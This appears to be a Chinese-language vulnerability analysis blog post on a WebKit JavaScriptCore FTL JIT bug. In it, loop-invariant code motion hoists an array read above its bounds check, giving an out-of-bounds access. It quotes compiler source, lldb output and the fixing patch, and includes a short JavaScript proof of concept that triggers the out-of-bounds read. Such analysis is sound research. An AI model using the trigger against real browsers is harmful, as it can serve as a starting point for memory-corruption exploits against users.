2023-2-8 11:48:52 Author: 编码安全研究(查看原文) 阅读量:14 收藏

FTL JIT的LICM由于错误的将GetByVal提升到preheader导致没有检查数组边界从而造成OOB访问





(lldb) b WebKit/Source/JavaScriptCore/dfg/DFGLICMPhase.cpp:224


// WebKit/Source/JavaScriptCore/dfg/DFGLICMPhase.cppif (!data.preHeader) { if (verbose) dataLog(" Not hoisting ", node, " because the pre-header is invalid.\n"); return false; }
if (!data.preHeader->cfaDidFinish) { if (verbose) dataLog(" Not hoisting ", node, " because CFA is invalid.\n"); return false; }
if (!edgesDominate(m_graph, node, data.preHeader)) { if (verbose) { dataLog( " Not hoisting ", node, " because it isn't loop invariant.\n"); } return tryHoistChecks(); }
if (doesWrites(m_graph, node)) { if (verbose) dataLog(" Not hoisting ", node, " because it writes things.\n"); return tryHoistChecks(); }
if (readsOverlap(m_graph, node, data.writes)) { if (verbose) { dataLog( " Not hoisting ", node, " because it reads things that the loop writes.\n"); } return tryHoistChecks(); }
if (addsBlindSpeculation && !canSpeculateBlindly) { if (verbose) { dataLog( " Not hoisting ", node, " because it may exit and the pre-header (", *data.preHeader, ") is not control equivalent to the node's original block (", *fromBlock, ") and hoisting had previously failed.\n"); } return tryHoistChecks(); }
if (!safeToExecute(m_state, m_graph, node)) { // See if we can rescue the situation by inserting blind speculations.bool ignoreEmptyChildren = true; if (canSpeculateBlindly && safeToExecute(m_state, m_graph, node, ignoreEmptyChildren)) { if (verbose) { dataLog( " Rescuing hoisting by inserting empty checks.\n"); } m_graph.doToChildren( node, [&] (Edge& edge) { if (!(m_state.forNode(edge).m_type & SpecEmpty)) return;
Node* check = m_graph.addNode(CheckNotEmpty, originalOrigin, Edge(edge.node(), UntypedUse)); insertHoistedNode(check); }); } else { if (verbose) { dataLog( " Not hoisting ", node, " because it isn't safe to execute.\n"); } return tryHoistChecks(); } }

重点关注edgesDominate(m_graph, node, data.preHeader)


// WebKit/Source/JavaScriptCore/dfg/DFGEdgeDominates.hclass EdgeDominates { static const bool verbose = false; ... void operator()(Node*, Edge edge){ bool result = m_graph.m_ssaDominators->dominates(edge.node()->owner, m_block); if (verbose) { dataLog( "Checking if ", edge, " in ", *edge.node()->owner, " dominates ", *m_block, ": ", result, "\n"); } m_result &= result; } ...private: Graph& m_graph; BasicBlock* m_block; bool m_result;}
inline bool edgesDominate(Graph& graph, Node* node, BasicBlock* block){ EdgeDominates edgeDominates(graph, block); DFG_NODE_DO_TO_CHILDREN(graph, node, edgeDominates); return edgeDominates.result();}
// WebKit/Source/JavaScriptCore/dfg/DFGGraph.h#define DFG_NODE_DO_TO_CHILDREN(graph, node, thingToDo) do { \ Node* _node = (node); \ if (_node->flags() & NodeHasVarArgs) { \ for (unsigned _childIdx = _node->firstChild(); \ _childIdx < _node->firstChild() + _node->numChildren(); \ _childIdx++) { \ if (!!(graph).m_varArgChildren[_childIdx]) \ thingToDo(_node, (graph).m_varArgChildren[_childIdx]); \ } \ } else { \ for (unsigned _edgeIndex = 0; _edgeIndex < AdjacencyList::Size; _edgeIndex++) { \ Edge& _edge = _node->children.child(_edgeIndex); \ if (!_edge) \ break; \ thingToDo(_node, _edge); \ } \ } \ } while (false)
// WebKit/Source/WTF/wtf/Dominators.hbool strictlyDominates(typename Graph::Node from, typename Graph::Node to) const { return m_data[to].preNumber > m_data[from].preNumber && m_data[to].postNumber < m_data[from].postNumber; } bool dominates(typename Graph::Node from, typename Graph::Node to) const{ return from == to || strictlyDominates(from, to); }

整个代码的逻辑不算很复杂,就是判断一个node的所有child是否为edge dominate的方法是判断child->owner是否为block0或者是否为strictly dominates


(lldb) p edge.node()->op()(JSC::DFG::NodeType) $95 = GetStack(lldb) p edge.node()->owner->index(JSC::DFG::BlockIndex) $96 = 0(lldb) p edge.node()->op()(JSC::DFG::NodeType) $98 = JSConstant(lldb) p edge.node()->owner->index(JSC::DFG::BlockIndex) $99 = 0(lldb) p edge.node()->op()(JSC::DFG::NodeType) $100 = GetButterfly(lldb) p edge.node()->owner->index(JSC::DFG::BlockIndex) $101 = 0

因为三个child都为edge dominate,所以getByVal会被尝试hoistblock0(还要同时满足其他条件)


(lldb) p edge.node()->op()(JSC::DFG::NodeType) $52 = JSConstant(lldb) p edge.node()->owner->index(JSC::DFG::BlockIndex) $53 = 0(lldb) p m_block->index(JSC::DFG::BlockIndex) $55 = 0(lldb) p edge.node()->op()(JSC::DFG::NodeType) $56 = GetArrayLength(lldb) p edge.node()->owner->index(JSC::DFG::BlockIndex) $57 = 2(lldb) p m_block->index(JSC::DFG::BlockIndex) $58 = 0

可以发现其child GetArrayLength属于block2,不为edge dominate,因此无法被hoist



(lldb) b WebKit/Source/JavaScriptCore/dfg/DFGSSALoweringPhase.cpp:84


case GetByVal: { lowerBoundsCheck(m_graph.varArgChild(m_node, 0), m_graph.varArgChild(m_node, 1), m_graph.varArgChild(m_node, 2)); break; }


bool lowerBoundsCheck(Edge base, Edge index, Edge storage) { if (!m_node->arrayMode().permitsBoundsCheckLowering()) return false;
if (!m_node->arrayMode().lengthNeedsStorage()) storage = Edge();
NodeType op = GetArrayLength; switch (m_node->arrayMode().type()) { case Array::ArrayStorage: case Array::SlowPutArrayStorage: op = GetVectorLength; break; case Array::String: // When we need to support this, it will require additional code since base's useKind is KnownStringUse. DFG_CRASH(m_graph, m_node, "Array::String's base.useKind() is KnownStringUse"); break; default: break; }
Node* length = m_insertionSet.insertNode( m_nodeIndex, SpecInt32Only, op, m_node->origin, OpInfo(m_node->arrayMode().asWord()), Edge(base.node(), KnownCellUse), storage); m_insertionSet.insertNode( m_nodeIndex, SpecInt32Only, CheckInBounds, m_node->origin, index, Edge(length, KnownInt32Use)); return true; }

GetArrayLengthCheckInBounds,其中GetArrayLength作为了CheckInBoundsedge dominate,然鹅,依赖于CheckInBounds的节点同样需要有edge dominate,所以我们可以看到在patch中增加了一段

Node* length = m_insertionSet.insertNode( m_nodeIndex, SpecInt32Only, op, m_node->origin, OpInfo(m_node->arrayMode().asWord()), Edge(base.node(), KnownCellUse), storage);- m_insertionSet.insertNode(+ Node* checkInBounds = m_insertionSet.insertNode( m_nodeIndex, SpecInt32Only, CheckInBounds, m_node->origin, index, Edge(length, KnownInt32Use));++ AdjacencyList adjacencyList = m_graph.copyVarargChildren(m_node);+ m_graph.m_varArgChildren.append(Edge(checkInBounds, UntypedUse));+ adjacencyList.setNumChildren(adjacencyList.numChildren() + 1);+ m_node->children = adjacencyList; return true; }



// Run with --thresholdForFTLOptimizeAfterWarmUp=1000// First array probably required to avoid COW backing storage or so...const v3 = [1337,1337,1337,1337]; const v6 = [1337,1337];
function v7(v8) { for (let v9 in v8) { v8.a = 42; const v10 = v8[-698666199]; } }
while (true) { const v14 = v7(v6); const v15 = v7(1337);    }

在FTL层中进行JIT编译期间,v7JIT IR将具有以下属性:

  • 由于属性访问,将为v8插入结构检查,该检查将确保数组在运行时具有正确的类型(ArrayWithInt32,具有属性a)

  • 循环头获取枚举的数组长度

  • v8的元素访问被(错误地?)推测为InBounds,大概是因为负数实际上不是有效的数组索引,而是常规的属性名称

  • 结果,元素访问将被优化为一个CheckBounds node,然后是一个GetByVal node(都在循环体内)

  • CheckBounds node将常量索引与循环头中加载的数组长度进行比较


# Loop headerlen = LoadArrayLength v8// Do other loop header stuff
# Loop bodyCheckStructure v8, expected_structure_idStoreProperty v8, 'a', 42CheckBounds -698666199, len // Bails out if index is OOB (always in this case...)GetByVal v8, -698666199 // Loads the element from the backing storage without performing additional checks
// Jump back to beginning of loop

这是loop-invariant code motion(LICM)期间接下来发生的事情,这是一种优化设计,用于在不需要多次执行的情况下将代码移动到循环体前面的循环头内:

  1. LICM确定CheckStructure node可以移到循环头的前面,并这样做

  2. LICM确定CheckBounds节点不能移到循环头,因为它取决于仅加载到循环头中的数组长度

  3. LICM确定可以将数组访问(GetByVal)移到循环头的前面(因为它不依赖于任何循环变量),并且这样做


StructureCheck v8, expected_structure_idGetByVal v8, -698666199
# Loop headerlen = LoadArrayLength v8// Do other loop header stuff
# Loop bodyStoreProperty v8, 'a', 42CheckBounds -698666199, len
// Jump back to beginning of loop


然后,在访问内存v6元素向量之前698666199 * 8个字节时,提供的PoC崩溃

仅当safeToExecute(来自DFGSafeToExecute.h)返回true时,才会将GetByVal移到循环头前.该函数似乎只关心类型检查,因此在这种情况下,可以得出结论GetByVal可以移到循环头的前面是因为StructureCheck(执行类型检查)也移到了循环头.这似乎是需要属性存储(v8.a = 42)的原因,因为它强制执行CheckStructure node,否则该节点将丢失

似乎有必要使用非数组参数调用v7(在这种情况下为1337),以免过于频繁地触发早期JIT层中的bailout,这将阻止FTL JIT编译该函数




